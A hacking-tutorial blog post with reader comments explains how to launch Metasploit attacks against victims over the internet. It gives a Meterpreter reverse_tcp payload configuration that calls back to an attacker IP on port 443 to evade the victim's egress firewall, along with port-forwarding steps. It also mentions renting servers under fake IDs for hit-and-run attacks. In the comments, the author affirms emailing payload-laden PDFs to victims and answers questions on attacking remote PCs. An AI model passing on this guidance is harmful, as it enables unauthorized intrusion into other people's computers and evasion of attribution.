How to do Hacking the Internet(WAN) Not LAN Using Metasploit – The Logic
Type : Tutorial
Level : Medium, Advanced
A few days ago there's someone put a message on my contact in this website, he asking about "is it possible to do hacking outside LAN(Local Area Network)?". When you see all of my articles, 80% of all hacking articles were written for Local Area Network, because I'm doing in my own lab, "so how about hacking outside Local Area Network?". Of course it has the same logic like when you attacking from Local Area Network 
.
Requirement :
1. Virtual Private Server. For Backtrack 5 already installed VPS, you can view here (but you also can install yourself)
3. Cloud Server(I haven't try this ) e.g : Amazon
4. Internet With Public IP
5. You can control router by yourself
Step-By-Step :
1. Okay let's start from Virtual Private Server(VPS). This server can give you freedom to install any software you want on virtualization, because this hosting type give you flexibility to manage your server yourself (DIY)
2. Dedicated Server almost doing the same like VPS(Virtual Private Server), but usually you have your own machine and then you put your machine on data center(or the service provider rent you their machine). This hosting type also allow you as user to manage your system yourself. You can do anything to your server and install anything you want to your server.
3. Cloud server –> I haven't trying this…maybe someone can share
4. You have internet with public IP address… usually when you subscribe 1:1 internet bandwidth, they also give you 1 public IP.
5. Control router by ourselves to redirect incoming connection or outgoing connection.
Before we continue to next step, let's see the figure below(I will try to figure it out in simple way) :
Legends(Attacker) :
- Attacker1 use local IP address –> 192.168.8.8
- Attacker1 have public IP address –> 73.67.123.85
- Attacker1 can control his router to redirect any incoming/outgoing traffic.
- Attacker2 use VPS/Dedicated/Cloud server to do an attack that connected directly to internet.
Legends(Victim) :
- Victim1 have local IP address –> 192.168.1.2
- Victim2 connected to internet via router+firewall, this firewall only allowing port 80 and 443 for outgoing connection
- Victim2 connected directly to internet with IP address –> 98.87.112.89
How to Attack? :
Actually the network topology I draw above it's almost the same method to attack, you should know what is typical rules when administrator setting up a firewall(in this case is the network administrator who administer router for victim1). AFAIK they usually open specific port like :
TCP 80(Hyper Text Transfer Protocol – HTTP) –> For browsing and surfing the website
TCP 443(Secure Socket Layer – SSL) –> Secure HTTP connection or usually called HTTPS
etc(you can scan it first but be careful).
From the information above, usually attacker can create some payload and options like this :
set payload windows/meterpreter/reverse_tcp set lhost 73.67.123.85 set lport 443
When the attack successfully launch, the payload will try to connect to IP address 73.67.123.85 with port 443. Attacker use port 443 because he know that victim1 firewall only allow port 80 and 443 for outgoing connection. If you configure the payload by using another port, the victim1 firewall will drop all unintended packet who will go through another port except 80 and 443. For the next step, attacker should configure his router to redirect all incoming traffic to port 443 to his local IP address 192.168.8.8.
You can see the tutorial about example port forwarding WRT54G router here. Actually all router will have the same option for port forwarding
Update :
If you use Windows machine as a router, you can read about port forwarding tutorial here(How to do port forwarding in Windows)
Oops…I almost forget to explain how to do that from VPS/Dedicated/Cloud….
Actually from VPS/Dedicated/Cloud it will be more easier and also safer(maybe..LoL), because there's a lot of hacker use this service…they buy using fake ID(hit and run) and then perform an attack from its server. The logic is almost the same with I've already explained above.
You should remember that every action triggering some consequences even it's good or bad. When you doing something you should know every consequences you will get later when doing the action. Be wise
Hope it's useful for you.
If information I wrote here was wrong, let me know I'll correct it
Get the latest hacking tutorial by subscribe to this website :
Incoming search terms:
- metasploit wan
- how to hack the internet
- metasploit over internet
- how to hack wan
- armitage wan
- hacking wan
- metasploit port forwarding
- backtrack wan
- hack wan
- metasploit port 443
Written by Vishnu Valentino.
Founder of hacking-tutorial.com. Love PHP, offensive security and web. Contact him at me[-at-]vishnuvalentino.com
See all posts by v4L || Visit Website : http://www.vishnuvalentino.com
Popular Posts
64 Responsesto “How to do Hacking the Internet(WAN) Not LAN Using Metasploit – The Logic”
Trackbacks/Pingbacks
- Create EXE Backdoor Using Metasploit and Backtrack 5 in 4 simple steps | Vishnu Valentino Hacking Tutorial, Tips and Trick - [...] You also can learn how to implement this method to attack over the internet, but please read my previous ...
- 4 Langkah Hacking Kedalam Jcow Social Networking Web Server « Exohacker - [...] Pada contoh yang akan saya buat dibawah ini, korban menggunakan IP : 192.168.8.94… Jauh lebih baik kalau kawan-kawan mau ...
- Hacking Jcow Social Networking Webserver » Akiramitsu - [...] Pada contoh yang akan saya buat dibawah ini, korban menggunakan IP : 192.168.8.94… Jauh lebih baik kalau kawan-kawan mau ...
Leave a Reply
Links
Get Updates via Networkedblogs
There is a related and interesting blog post on the Netresec blog about how the meterpreter reverse_https backdoors can be detected.
http://www.netresec.com/?page=Blog&month=2011-07&post=How-to-detect-reverse_https-backdoors
A demo video of this would be helpful.
#Xt
sorry for that, but you can do it yourself when you have the requirement I describe above
V4L i lik ur tuts…
I,ve a problem! My ISP provides a dynamic Wan ip so….i created account in no-ip and creatd a host…& installed DUC their free client program…then i portforwd my router to my Lan ip…..DO I HAVE TO PROVIDE THE NO- IP HOSTNAME IN LHOST IN METASPLOIT PAYLOAD SETTING…PLS XPLAIN HOW TO USE NO-IP HOST NAME INORDER TO PROPERLY GET MY METERPRETER REVERSE CONNECTION!!! PLS HELP V4L!
Nice info master, mantap.
Hi,
nice tutorial!
I was just wondering, if you don't have a static IP. Couldn't you just use no-ip(http://www.no-ip.com/) to create a hostname to point to your dynamic IP?
And then set localhost like this: set lhost <yourhostname>
Bind the payload to an PDF file, and mail it to a victim
Do you think this is posible?
#Hitch4000
Yep it’s possible
I’ve already wrote it here and here
Bro How To Setup VPN ? :@
#Rijju
Maybe 1st you can see the explanation about VPN here http://en.wikipedia.org/wiki/Virtual_private_network, because VPN and VPS is something totally different.
If you ask about VPN, you can use program like TOR, HotSpot Shield, OpenVPN, etc…
but if you ask about VPS, you can ask further to your hosting provider about how to set it up(fyi:it’s not a free service you should pay monthly fee).
bRo Just Ek Bat BAtado Ke Port Forwarding Ke Liye Jo Apne tarika Diya He Isme Jo Ip he Wo Router Ki Ip He yA Host Ip He ?
Do u have to use backtrack to hack a remote pc ? I only have metaspolit with armitage. can u use just this instead? will it work on windows 7???
#Papgaur
You also can use it in Windows, afaik there’s metasploit in Windows…but if you use Linux(I’m using Backtrack) it will be more simple and easier. I’m suggest using Backtrack because this distro already designed to do computer hacking / pentest.
hey bro how to OPEN closed port m using USB DONGLE nd my ISP has BLOCKED ALL PORTS.so when i pratice ur attack in my lab i didn't get successfull due to closed ports .
one more thing how to use metasploit to hack web server . and web application give me ny tutorial
#Mohit
usually an ISP server will not block all of your port, but they will filter it. If you use USB dongle, it just affect your PC, not a whole network.
you need to find which port are open both victim & attacker (usually port 80, 443, etc)
Sir how to install VPS server….?
#sivaraaj
the most easy way you can buy an internet packet from your provider with public ip address…
you should buy it, then you can install it…
I managed to configure a DNS server so that the external client use my DNS server but when the client enters into facebook giousto dns not resolve the false one.
How to use a dns sever CENTOS I miss something in the configuration of named.conf? I hope it can help
#orsettobubu
hmm…yep I think maybe you miss something in your configuration…
yup ok**banget untuk kami kaum yg tertidas**untuk pedidikan**
hey im a big fan of your blog and hats off to your tutorials
ok let me get to the point
i was trying to port forward my router so that i can use metasploit over the net but unfortunately it isnt working i dont know why
here are the settings which i used:-
in the port forwarding tab i have given my local ip address:192.168.1.x
with the port no:443
i have configured the network of my virtual machine to bridge
in back track i have configured it to use a static ip: 192.168.1.x(which i have configured in the router in the port forwarding tab)
DNS1:8.8.8.8
DNS2:8.8.4.4
after doing all this and setting a credential harvester method i gave my ip to my friend(192.168.1.x)
but nothing , he said it gave a 404 error
i dont know why
please help me out in doing port forwarding stuff if im doing it wrong
peace
#piyush
if you give that ip 192.168.1.x to your friend, of course won’t work..it’s local port…you should give your router address..
on your router usually there’s forwarding port…so when someone open ip like : 121.23.45.72:9999 the router should redirect that request to your local ip address.
thanx for your lightning fast comment bro…
i have done accordingly you said but when i use the java applet attack method it ask me if in using a NAT i type "yes"
then it says IP address of the set web server i type "my local IP"
then it says is your payload handler on diffrent IP i type "no"
after all that it says failed to blind to 192.168.1.4:80
i dont know why ?
please help
and im a NOOB please do elaborate
thanx
#piyush
ip address of set web server should be your router, your router will forward every incoming packet that come to port 80 to your local IP.
HI .
I read your tuts thats very cool really.. i need your help little )) how can i find other computers in my lan ..everytime i try nmap result is 1 host up(thats me) ..i want to try sslstrip but for that i dont find any computer for proceed ..i have beetel router ..i hope you can solve this issue ))
thanks
#joand
did you have other clients connected with your local network?
if yes and you still find nothing, then it’s because the firewall blocked your nmap request.
if you ask to scan other ip outside your network, the answers is yes and no….
yes if you can route your network to the network destination you want to scan
no if you can’t do that
hi someone can tell ..how to scan ip behind the router …becouse everytime i scan wd nmap result is 1 host up..how i can get other host computer
I was waiting for the stuff for years… the way u explained is just Great
thank perfect answer ))))
do need to telnet every WAN ip to execute MITM? even i have access to router login and password..can you please make a detail tutorial on MITM on WAN? it is possible to telnet WAN ip ?
#joand
btw usually MITM do inside a local network(but doesn’t mean it can’t do in public network)…
yes you need to remote your server on the internet…but it’s better to learn on your local network..
yes it’s possible if the server has a vulnerability.
Sir the problem is i do not have any other host computer in my lan network…and i want to know how can i find other host computer to execute any attack like MITM?
#joand
if you already know the logic for this MITM, it will much easier for you to understanding further…
if not, then my suggestion is : it’s better you try on your local network..if you don’t have other computer, then build a virtual machine and learn + try it first on your computer how to perform this.
i have virtual machine backtrack OS .and i do successfully mitm on my window xp….and got all the ssl logs… in Lan all successful execute
as i say i have two ip ..lan is .192.168.1.x…and wan ip is 122.145.23.x like that..scan wan ip i got result many host ip live . …here is the question how can i redirect all outgoing and incoming traffic of these wan ip's through my host computer..
please if possible tell in detail thank you for your previous reply
#joand
If you can do that on your local network, then it remains the same for public…
if i knew how to do it i would not ask you LOL …
#joand
so you can start your research now
here’s the post maybe can help you :
vishnuvalentino.com/hacking-tutorial/spi-port-forward-redirection-for-windows-to-another-port-ip-address
Give a man a fish and he will eat for a day. Teach him how to fish and he will sit in a boat and drink beer all day.
Give a man a fish …make me smile ))) it true indeed
i know a guy who is also alone in his lan network but he is doing mitm successfully on other guys comp..just dnt know how he get these comps for attack ..and he dnt even want to tell me lol ))) i try my best to find way but smtimes got confuse and run in many directions ))
Hi v4L,
your tutorials are great.
For this kind of attack, how can I find the victim's open ports? For example I have his public ip and then what I have to do? I've tried to forward a port and it succeded, it was really open that port, but I need to forward a port that the victim has open too! How can I find it?
I thank you for your time
Baldassarre
#Baldassarre
Actually if you saw the picture, you can scan victim 2 directly;
but if it was victim 1, while you scan the ip, it’s not actual victim 1 ip address but it was the router(victim 1 was behind the router).
btw if you read this tutorial, it wasn’t talk about scanning ip address or something you describe in your question.
Hi my friend, I have port forward my router and i made a nessus scan of a remote host. It’s vulnerable and i’m trying to exploit it. How do i set up my payload, should i set my open port or should i set the port of the vulnerable application (php)?
#timetraveler
maybe you can learn about the logic from this tutorial http://www.hacking-tutorial.com/hacking-tutorial/exploiting-ms11_003-internet-explorer-vulnerability-using-metasploit-framework/
or this one http://www.hacking-tutorial.com/hacking-tutorial/hacking-tutorial-windows-xp-sp3-using-adobe-flash-player-mp4-vulnerability/
Hello.i want to ask if the hack is possible to made without the VPS or other host server just using our internal or external IP can be work?thanks a lot
#john D
you can view my other post here http://www.hacking-tutorial.com/hacking-tutorial/how-to-hacking-wan-internet-by-using-public-dynamic-ip-address/
can we hack any internet service provider and can use internet free of cost with airtel,docomo,idea?
#Avinash
oops i didn’t know about it…i also didn’t use their service
hi, i want to remote access xp cmd in lan via ip address through lhost and rhost method i’m using backtrack r1 …do not want to use any virus, pdf, link etc,etc…i just know victim local ip address …will u plz help me
#Deepsa
then the answer is NOT.
only a vulnerable OS you can do like that.
thanks Bro
Hi , I dont have access to the router administration (only my father have the pswd :p and won’t give it to me )I’m runing bt can I do NAPT just by using iptables in order to do this :
192.168.1.12 : 443 = xx.xx.xx.xx : yyy
xx.xx.xx.xx is my public ip and yyy the port that the payload will use .. help please :’(
#Bree
you need to have an access to your router
ok thanks a lot
can we hack a PC which is from another country or another state or city?
let me clear it if i want to hack a pc and he has their own internet connection and i have a pc and i have my own internet connection. can i hack ? or for WAN hacking 1st we need to connect our backtrack with their internet(WAN) ?
#Rahul
maybe you can use client hacking.
thanks for reply…. sorry didnt get client hacking any article on this ?
MAN YOU ARE A TOTAL STUD, FIRST DAY READING AND IM ADDICTED. THANK YOU! GREETINGS FROM BULGARIA
#boris
Thanks
hello vishnu ….
i need to know that how can i remotely control my cafes route from my home with a laptop via internet…
Hi.
This things was as easy as 123 for me before. That was when I still on a static IP and have a router. But I moved to a place where I can only connect to the cyberspace via 3G dongle that is behind an ISP NAT and have a Dynamic IP.
Any advice on doing this using 3G dongle? I also don't have a router to port forward to my local ip. I tried No-IP but it didn't work.
Thanks
#jason
you must have a full control to your router to forward incoming packet to your local network.
u didnt told what ip address we have to set for victum wan ip or local ip coz if we set wan ip it will only connect with router not lan ips explain plz
#zain
that’s why you need to forward the packet from router to your local network.
if you use router box, find your manufacturer brand and find how to do port forwarding e.g:http://www.dd-wrt.com/wiki/index.php/Port_Forwarding
if your router is a pc(windows), see here http://www.hacking-tutorial.com/hacking-tutorial/spi-port-forward-redirection-for-windows-to-another-port-ip-address/
port forward at attacker side or client side or both?
#c4
attacker side
thank u sir for ur quick response